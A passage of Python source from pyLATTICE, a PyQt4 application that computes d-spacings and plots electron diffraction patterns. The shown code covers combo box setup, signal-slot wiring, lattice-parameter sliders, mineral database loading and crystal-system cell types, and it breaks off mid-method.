self.comboBox_kmax.addItems(self.miller_indices)
self.comboBox_lmax.addItems(self.miller_indices)
#self.setMillerMax_h()
#self.setMillerMax_k()
#self.setMillerMax_l()
self.comboBox_hmax.setCurrentIndex(8)
self.comboBox_kmax.setCurrentIndex(8)
self.comboBox_lmax.setCurrentIndex(8)
#Set zone axis parameters
#by default set as [0 0 1]
zone_indices = [str(x) for x in range(-5,6)]
self.comboBox_u.addItems(zone_indices)
self.comboBox_v.addItems(zone_indices)
self.comboBox_w.addItems(zone_indices)
self.comboBox_u.setCurrentIndex(5)
self.comboBox_v.setCurrentIndex(5)
self.comboBox_w.setCurrentIndex(6)
#set calculator comboboxes
self.comboBox_h1.addItems(self.miller_indices)
self.comboBox_h2.addItems(self.miller_indices)
self.comboBox_k1.addItems(self.miller_indices)
self.comboBox_k2.addItems(self.miller_indices)
self.comboBox_l1.addItems(self.miller_indices)
self.comboBox_l2.addItems(self.miller_indices)
self.comboBox_h1.setCurrentIndex(7)
self.comboBox_h2.setCurrentIndex(8)
self.comboBox_k1.setCurrentIndex(6)
self.comboBox_k2.setCurrentIndex(6)
self.comboBox_l1.setCurrentIndex(6)
self.comboBox_l2.setCurrentIndex(6)
#Initialize mineral database combobox
self.setMineralList()
#Initialize rotation of diffraction pattern.
#Will only offer 0,90,180,270 degrees
rotate_items = ['-180','-150','-120','-90','-60','-30','0','30','60','90','120','150','180']
self.comboBox_rotate.addItems(rotate_items)
self.comboBox_rotate.setCurrentIndex(6) #zero by default
#get values in energy, cam legnth, cam const. combo boxes
self.spinBox_beamenergy.setValue(int(self.common.beamenergy))
self.spinBox_camlength.setValue(int(self.common.camlength))
self.doubleSpinBox_camconst.setValue(self.common.camconst)
#Initialize signals and slots
#This needs to go here after setting Miller indices
#When initializing, it runs Recalculate to do metric tensor and d-spacings
#must go before setting crystal types, but after setting all of the combo boxes
#combo boxes recalculate each time their index changes once the signals/slots set up
#if signals/slots placed before, will recalc d-spacings every time you initialize a combobox value
self.signals_slots()
# Set crystal type combo box items:
self.crystaltypes = ['Cubic','Tetragonal','Orthorhombic','Trigonal', 'Hexagonal','Monoclinic','Triclinic']
self.comboBox_crystaltype.addItems(self.crystaltypes)
#Redo some labels in unicode/greek characters
self.label_alpha.setText(u'\u03B1')
self.label_beta.setText(u'\u03B2')
self.label_gamma.setText(u'\u03B3')
self.label_dist_recip.setText(u'Reciprocal Distance (\u212B\u207B\u00B9 )')
self.label_dist_real.setText(u'Real Distance (\u212B)')
self.label_dist_film.setText(u'Film Distance (cm)')
self.label_angle.setText(u'Angle (\u00B0)')
v = self.version.split('.')
pv = v[0] + '.' + v[1] #only major/minor versions. not bugfixes
self.label_pyLATTICE.setText(u'pyLATTICE %s' % pv)
#initialize popup IPython console
#can interact with specific data
self._initIPython(self.common)
def _grabCommon(self):
"""Get all common variables."""
self.common = common()
self._overline_strings = self.common._overline_strings
self.DSpaces = self.common.DSpaces
self.ZoneAxis = self.common.ZoneAxis
self.u = self.common.u
self.v = self.common.v
self.w = self.common.w
#lattice parameters and angles
self.a = self.common.a
self.b = self.common.b
self.c = self.common.c
self.astar = self.common.astar
self.bstar = self.common.bstar
self.cstar = self.common.cstar
self.alpha = self.common.alpha
self.beta = self.common.beta
self.gamma = self.common.gamma
self.alphastar = self.common.alphastar
self.betastar = self.common.betastar
self.gammastar = self.common.gammastar
#TEM params
self.beamenergy = self.common.beamenergy
self.camlength = self.common.camlength
self.camconst = self.common.camconst
self.wavelength = self.common.wavelength
#SpaceGroup data
self.sg = self.common.sg
self.sghex = self.common.sghex
self.mineraldb = self.common.mineraldb
self.manualConds = self.common.manualConds #manual space group conditions
def updateCommon(self):
"""Update all of the common variables and push these to the IPython console"""
self.common.DSpaces = self.DSpaces
self.common.ZoneAxis = self.ZoneAxis
self.common.u = self.u
self.common.v = self.v
self.common.w = self.w
self.common.a = self.a
self.common.b = self.b
self.common.c = self.c
self.common.astar = self.astar
self.common.bstar = self.bstar
self.common.cstar = self.cstar
self.common.alpha = self.alpha
self.common.beta = self.beta
self.common.gamma = self.gamma
self.common.alphastar = self.alphastar
self.common.betastar = self.betastar
self.common.gammastar = self.gammastar
#mineral database and manual conditions
#self.mineraldb = self.common.mineraldb
self.common.manualConds = self.manualConds #manual space group conditions
self.common.beamenergy = self.beamenergy = self.spinBox_beamenergy.value()
self.common.camlength = self.camlength = self.spinBox_camlength.value()
self.common.camconst = self.camconst = self.doubleSpinBox_camconst.value()
self.common.wavelength = self.wavelength = self.common.Wavelength(self.beamenergy)
self.updateIPY(self.common)
@QtCore.pyqtSlot(str,str,str,str)
def on_distances_sent(self,recip_d, real_d, film_d, angle):
self.lineEdit_recip_2.setText(recip_d)
self.lineEdit_real_2.setText(real_d)
self.lineEdit_film_2.setText(film_d)
self.lineEdit_angle_3.setText(angle)
def Recalculate(self):
"""Run MetricTensor() and D_Spacigns(). For use when slider hasn't changed"""
self.MetricTensor()
self.D_Spacings()
def ReplotDiffraction(self):
self.Recalculate()
try:
self.PlotDiffraction()
except UnboundLocalError:
pass
# def Print(self):
# """test print fn"""
# print(self.comboBox_spacegroup.currentIndex())
def signals_slots(self):
"""All of the signals and slots not in .ui file"""
#Testing
#QtCore.QObject.connect(self.command_Wulff, QtCore.SIGNAL(_fromUtf8("clicked()")),WULFF)
### Menu actions
QtCore.QObject.connect(self.actionClose, QtCore.SIGNAL(_fromUtf8("triggered()")), self.close)
QtCore.QObject.connect(self.actionAbout, QtCore.SIGNAL(_fromUtf8("triggered()")), self.About)
QtCore.QObject.connect(self.actionHow_to, QtCore.SIGNAL(_fromUtf8("triggered()")), self.HowTo)
QtCore.QObject.connect(self.actionSave_D_spacings, QtCore.SIGNAL(_fromUtf8("triggered()")), self.SaveDSpace)
QtCore.QObject.connect(self.actionRemove_DB_Minerals, QtCore.SIGNAL(_fromUtf8("triggered()")), self.removeMinerals)
QtCore.QObject.connect(self.actionSave_Mineral_Database, QtCore.SIGNAL(_fromUtf8("triggered()")), self.SaveMineralDB)
QtCore.QObject.connect(self.actionLoad_Mineral_Database, QtCore.SIGNAL(_fromUtf8("triggered()")), self.LoadMineralDB)
QtCore.QObject.connect(self.actionAppendMineral, QtCore.SIGNAL(_fromUtf8("triggered()")), self.AppendMineral)
QtCore.QObject.connect(self.actionIPython_Console, QtCore.SIGNAL(_fromUtf8("triggered()")), self.IPY)
QtCore.QObject.connect(self.actionManualCond, QtCore.SIGNAL(_fromUtf8("triggered()")), self.ManualConditions)
QtCore.QObject.connect(self.actionSettings, QtCore.SIGNAL(_fromUtf8("triggered()")), self.setSettings)
### Command buttons
QtCore.QObject.connect(self.command_Plot, QtCore.SIGNAL(_fromUtf8("clicked()")),self.PlotDiffraction)
QtCore.QObject.connect(self.command_recalculate, QtCore.SIGNAL(_fromUtf8("clicked()")),self.Recalculate)
#QtCore.QObject.connect(self.command_Wulff, QtCore.SIGNAL(_fromUtf8("clicked()")),self.updateIPY)
### crystal and cell type actions
QtCore.QObject.connect(self.comboBox_crystaltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setCellType)
QtCore.QObject.connect(self.comboBox_celltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setConditions)
QtCore.QObject.connect(self.spinBox_spacegroup, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.SpaceGroupLookup)
QtCore.QObject.connect(self.checkBox_obverse, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.D_Spacings)
QtCore.QObject.connect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
#QtCore.QObject.connect(self.comboBox_spacegroup, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.D_Spacings)
### Navigation Toolbar buttons
QtCore.QObject.connect(self.comboBox_rotate, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.PlotDiffraction)
QtCore.QObject.connect(self.checkBox_labels, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.PlotDiffraction) #labels checkbox
### Checkboxes and Miller indices
QtCore.QObject.connect(self.checkBox_samemin, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.sameMin)
QtCore.QObject.connect(self.checkBox_samemax, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.sameMax)
QtCore.QObject.connect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_kmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_lmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_kmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_lmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.checkBox_showforbidden, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.PlotDiffraction)
### Sliders/spin boxes: lattice parameters
QtCore.QObject.connect(self.hSlider_a, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.slider_to_spindouble)
QtCore.QObject.connect(self.hSlider_b, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.slider_to_spindouble)
QtCore.QObject.connect(self.hSlider_c, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.slider_to_spindouble)
QtCore.QObject.connect(self.hSlider_a, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_b, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_c, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.doubleSpinBox_a, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.spindouble_to_slider)
QtCore.QObject.connect(self.doubleSpinBox_b, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.spindouble_to_slider)
QtCore.QObject.connect(self.doubleSpinBox_c, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.spindouble_to_slider)
QtCore.QObject.connect(self.doubleSpinBox_a, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.MetricTensor)
QtCore.QObject.connect(self.doubleSpinBox_b, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.MetricTensor)
QtCore.QObject.connect(self.doubleSpinBox_c, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.MetricTensor)
#QtCore.QObject.connect(self.doubleSpinBox_a, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.D_Spacings)
#QtCore.QObject.connect(self.doubleSpinBox_b, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.D_Spacings)
#QtCore.QObject.connect(self.doubleSpinBox_c, QtCore.SIGNAL(_fromUtf8("valueChanged(double)")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_alpha, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.MetricTensor)
QtCore.QObject.connect(self.hSlider_beta, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.MetricTensor)
QtCore.QObject.connect(self.hSlider_gamma, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.MetricTensor)
QtCore.QObject.connect(self.hSlider_alpha, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_beta, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
QtCore.QObject.connect(self.hSlider_gamma, QtCore.SIGNAL(_fromUtf8("sliderReleased()")), self.D_Spacings)
#Spinboxes beam energy, cam length, camconst
QtCore.QObject.connect(self.spinBox_beamenergy,QtCore.SIGNAL(_fromUtf8("valueChanged(int)")),self.updateCommon)
QtCore.QObject.connect(self.spinBox_camlength,QtCore.SIGNAL(_fromUtf8("valueChanged(int)")),self.updateCommon)
QtCore.QObject.connect(self.doubleSpinBox_camconst,QtCore.SIGNAL(_fromUtf8("valueChanged(double)")),self.updateCommon)
#Instances to recalculate metric tensor and d-spacings
#only enable these once you get miller maxes sorted out so they don't change
QtCore.QObject.connect(self.checkBox_zoneaxis, QtCore.SIGNAL(_fromUtf8("toggled(bool)")),self.DiffWidget, QtCore.SLOT(_fromUtf8("setEnabled(bool)")))
QtCore.QObject.connect(self.comboBox_u, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.ReplotDiffraction)
QtCore.QObject.connect(self.comboBox_v, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.ReplotDiffraction)
QtCore.QObject.connect(self.comboBox_w, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.ReplotDiffraction)
QtCore.QObject.connect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.D_Spacings)
QtCore.QObject.connect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.D_Spacings)
#QtCore.QObject.connect(self.checkBox_labels, QtCore.SIGNAL(_fromUtf8("toggled(bool)")),self.UpdatePlot)
#QtCore.QObject.connect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.TempMax)
#QtCore.QObject.connect(self.comboBox_kmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.TempMax)
#QtCore.QObject.connect(self.comboBox_lmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.TempMax)
#QtCore.QObject.connect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.Recalculate)
#QtCore.QObject.connect(self.comboBox_kmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.Recalculate)
#QtCore.QObject.connect(self.comboBox_lmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.Recalculate)
#QtCore.QObject.connect(self.comboBox_w, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.ReplotDiffraction)
#Calculator Tab
QtCore.QObject.connect(self.checkBox_normals, QtCore.SIGNAL(_fromUtf8("toggled(bool)")),self.CalcLabels)
QtCore.QObject.connect(self.command_angle, QtCore.SIGNAL(_fromUtf8("clicked()")),self.Calculator)
def _initIPython(self,common):
"""Initialize IPython console from which the user can interact with data/files"""
banner = """Welcome to the pyLATTICE IPython Qt4 Console.
You are here to interact with data and parameters - Python command line knowledge required.
Use the 'whos' command for a list of available variables. Sometimes this does not work the first time.
Imported packages include: pylab (including numpy modules) as 'pl'; pandas as 'pd'
\n"""
self.ipywidget = IPythonConsole(common,banner=banner)
def IPY(self):
self.ipywidget.SHOW()
def updateIPY(self,common):
self.ipyvars = common.__dict__
self.ipywidget.pushVariables(self.ipyvars)
def slider_to_spindouble(self,slider):
"""Sliders only send/receive int data. Converts int to double by dividing by 100."""
if self.hSlider_a.isSliderDown():
self.a = self.hSlider_a.value() / 100
self.doubleSpinBox_a.setValue(self.a)
elif self.hSlider_b.isSliderDown():
self.b = self.hSlider_b.value() / 100
self.doubleSpinBox_b.setValue(self.b)
elif self.hSlider_c.isSliderDown():
self.c = self.hSlider_c.value() / 100
self.doubleSpinBox_c.setValue(self.c)
def spindouble_to_slider(self,spinbox):
"""Converts spindouble entry into int for slider (multiply by 100)"""
#There may be some redundancy in the connections setting values.
#hopefully this does not slow the program down.
#without these, some aspect often lags and gives the wrong value
if self.comboBox_crystaltype.currentText() == 'Cubic':
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.hSlider_b.setValue(self.a * 100);self.doubleSpinBox_b.setValue(self.a)
self.hSlider_c.setValue(self.a * 100);self.doubleSpinBox_c.setValue(self.a)
elif self.comboBox_crystaltype.currentText() == 'Tetragonal':
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.hSlider_b.setValue(self.a * 100); self.doubleSpinBox_b.setValue(self.a)
elif self.comboBox_crystaltype.currentText() == 'Trigonal':
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.hSlider_b.setValue(self.a * 100); self.doubleSpinBox_b.setValue(self.a)
elif self.comboBox_crystaltype.currentText() == 'Hexagonal':
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.hSlider_b.setValue(self.a * 100); self.doubleSpinBox_b.setValue(self.a)
else:
self.a = self.doubleSpinBox_a.value()
self.hSlider_a.setValue(self.a * 100)
self.b = self.doubleSpinBox_b.value()
self.hSlider_b.setValue(self.b * 100)
self.c = self.doubleSpinBox_c.value()
self.hSlider_c.setValue(self.c * 100)
def setMillerMax_h(self):
"""Sets the items available for the max miller indices to include everything greater than the selected min index"""
self.miller_max_h = [str(x) for x in range(int(self.comboBox_hmin.currentText()) + 1,7)]
self.comboBox_hmax.clear()
self.comboBox_hmax.addItems(self.miller_max_h)
def setMillerMax_k(self):
"""Sets the items available for the max miller indices to include everything greater than the selected min index"""
self.miller_max_k = [str(x) for x in range(int(self.comboBox_kmin.currentText()) + 1,7)]
self.comboBox_kmax.clear()
self.comboBox_kmax.addItems(self.miller_max_k)
def setMillerMax_l(self):
"""Sets the items available for the max miller indices to include everything greater than the selected min index"""
self.miller_max_l = [str(x) for x in range(int(self.comboBox_lmin.currentText()) + 1,7)]
self.comboBox_lmax.clear()
self.comboBox_lmax.addItems(self.miller_max_l)
def sameMin(self):
if not self.checkBox_samemin.isChecked():
#change to value_changed, not index changed. lengths may be different if checkboxes aren't clicked
QtCore.QObject.disconnect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.disconnect(self.comboBox_kmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.disconnect(self.comboBox_lmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
elif self.checkBox_samemin.isChecked():
QtCore.QObject.connect(self.comboBox_hmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_kmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_lmin, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmin,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
def sameMax(self):
if not self.checkBox_samemax.isChecked():
QtCore.QObject.disconnect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.disconnect(self.comboBox_kmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.disconnect(self.comboBox_lmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
elif self.checkBox_samemax.isChecked():
QtCore.QObject.connect(self.comboBox_hmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_kmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_kmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_lmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
QtCore.QObject.connect(self.comboBox_lmax, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(int)")), self.comboBox_hmax,QtCore.SLOT(_fromUtf8("setCurrentIndex(int)")))
def setMineral(self):
i = self.comboBox_mineraldb.currentIndex()
if i == 0:
pass
else:
#disconnect d-space calculations till the end
QtCore.QObject.disconnect(self.comboBox_crystaltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setCellType)
QtCore.QObject.disconnect(self.comboBox_celltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setConditions)
QtCore.QObject.disconnect(self.spinBox_spacegroup, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.SpaceGroupLookup)
m = self.mineraldb.loc[i]
ind = ['Cubic','Tetragonal','Orthorhombic','Trigonal','Hexagonal','Monoclinic','Triclinic'].index(m.Crystal)
self.comboBox_crystaltype.setCurrentIndex(ind)
self.setCellType()
ind = self.celltypes.index(m.UnitCell)
self.comboBox_celltype.setCurrentIndex(ind)
self.setConditions()
ind = self.sgnumbers.index(m.SpaceGroup)
self.comboBox_spacegroup.setCurrentIndex(ind)
#now a,b,c paramters
#print(self.sgnumbers)
self.doubleSpinBox_a.setValue(m.a)
self.a = m.a
if not np.isnan(m.b):
self.doubleSpinBox_b.setValue(m.b)
self.b = m.b
if not np.isnan(m.c):
self.doubleSpinBox_c.setValue(m.c)
self.c = m.c
try:
self.manualConds = m.SpecialConditions.split(';')
except AttributeError: #ignore floats or nans
self.manualConds = ''
self.MetricTensor()
#reconnect and calculate
QtCore.QObject.connect(self.comboBox_crystaltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setCellType)
QtCore.QObject.connect(self.comboBox_celltype, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setConditions)
QtCore.QObject.connect(self.spinBox_spacegroup, QtCore.SIGNAL(_fromUtf8("valueChanged(int)")), self.SpaceGroupLookup)
self.D_Spacings()
def setCellType(self):
"""Sets the unit cell possibilities based upon the crystal type selected"""
self.comboBox_celltype.clear()
self.comboBox_spacegroup.clear()
self.celltypes = []
if self.comboBox_crystaltype.currentText() == 'Cubic':
self.celltypes = ['Primitive','Face Centered','Body Centered']
self.length_label = u' a = b = c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(True); self.hSlider_c.setDisabled(True)
self.doubleSpinBox_b.setDisabled(True); self.doubleSpinBox_c.setDisabled(True)
self.angles_label = u' \u03B1 = \u03B2 = \u03B3 = 90°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 90
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Tetragonal':
self.celltypes = ['Primitive','Body Centered']
self.length_label = u' a = b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(True); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(True); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B2 = \u03B3 = 90°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 90
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Orthorhombic':
self.celltypes = ['Primitive','Face Centered','Body Centered','(001) Base Centered','(100) Base Centered']
self.length_label = u' a ≠ b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(False); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(False); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B2 = \u03B3 = 90°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 90
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Trigonal':
self.celltypes = ['Primitive','Rhombohedral','Rhombohedral, Hexagonal Axes','Hexagonal']
self.length_label = u' a = b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(True); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(True); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B2 = 90°, \u03B3 = 120°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 120
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Hexagonal':
self.celltypes = ['Primitive']
self.length_label = u' a = b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(True); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(True); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B2 = 90°, \u03B3 = 120°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 120
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Monoclinic':
self.celltypes = ['Primitive','(001) Base Centered']
self.length_label = u' a ≠ b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(False); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(False); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u' \u03B1 = \u03B3 = 90°'
self.label_angle_equality.setText(self.angles_label)
self.alpha = 90; self.beta = 90; self.gamma = 90
self.hSlider_alpha.setValue(self.alpha); self.hSlider_beta.setValue(self.beta); self.hSlider_gamma.setValue(self.gamma)
#disable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(True); self.hSlider_beta.setDisabled(True); self.hSlider_gamma.setDisabled(True)
self.spinBox_alpha.setDisabled(True); self.spinBox_beta.setDisabled(True); self.spinBox_gamma.setDisabled(True)
elif self.comboBox_crystaltype.currentText() == 'Triclinic':
self.celltypes = ['Primitive']
self.length_label = u' a ≠ b ≠ c'
self.label_lattice_equality.setText(self.length_label)
self.hSlider_b.setDisabled(False); self.hSlider_c.setDisabled(False)
self.doubleSpinBox_b.setDisabled(False); self.doubleSpinBox_c.setDisabled(False)
self.angles_label = u''
self.label_angle_equality.setText(self.angles_label)
#Enable editing sliders and spinboxes
self.hSlider_alpha.setDisabled(False); self.hSlider_beta.setDisabled(False); self.hSlider_gamma.setDisabled(False)
self.spinBox_alpha.setDisabled(False); self.spinBox_beta.setDisabled(False); self.spinBox_gamma.setDisabled(False)
self.comboBox_celltype.addItems(self.celltypes)
#self.Recalculate()
def setConditions(self):
"""Sets conditions based upon which unit cell type is chosen.
Store equations in strings and then evaluate and solve with eval()"""
geom = self.comboBox_crystaltype.currentText()
unit = self.comboBox_celltype.currentText()
if unit in ['Rhombohedral','Rhombohedral, Hexagonal Axes']:
self.checkBox_obverse.setDisabled(False)
else:
self.checkBox_obverse.setDisabled(True)
try: #there is a loop I cant find where this tries to calculate conditions before unit cell type is set resulting in index error.
#this simply supresses the error, as another pass is always fine.
if unit in ['Rhombohedral, Hexagonal Axes','Hexagonal']:
rhomhex=True
self.conditions = np.unique(self.sghex[self.sghex['Unit Cell'] == unit]['Conditions'])[0]
else:
rhomhex=False
self.conditions = np.unique(self.sg[self.sg['Unit Cell'] == unit]['Conditions'])[0] #grab individual condition b/c of repetition
self.setSpaceGroups(geom,unit,rhomhex)
#QtCore.QObject.disconnect(self.comboBox_spacegroup, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.D_Spacings)
self.comboBox_spacegroup.clear()
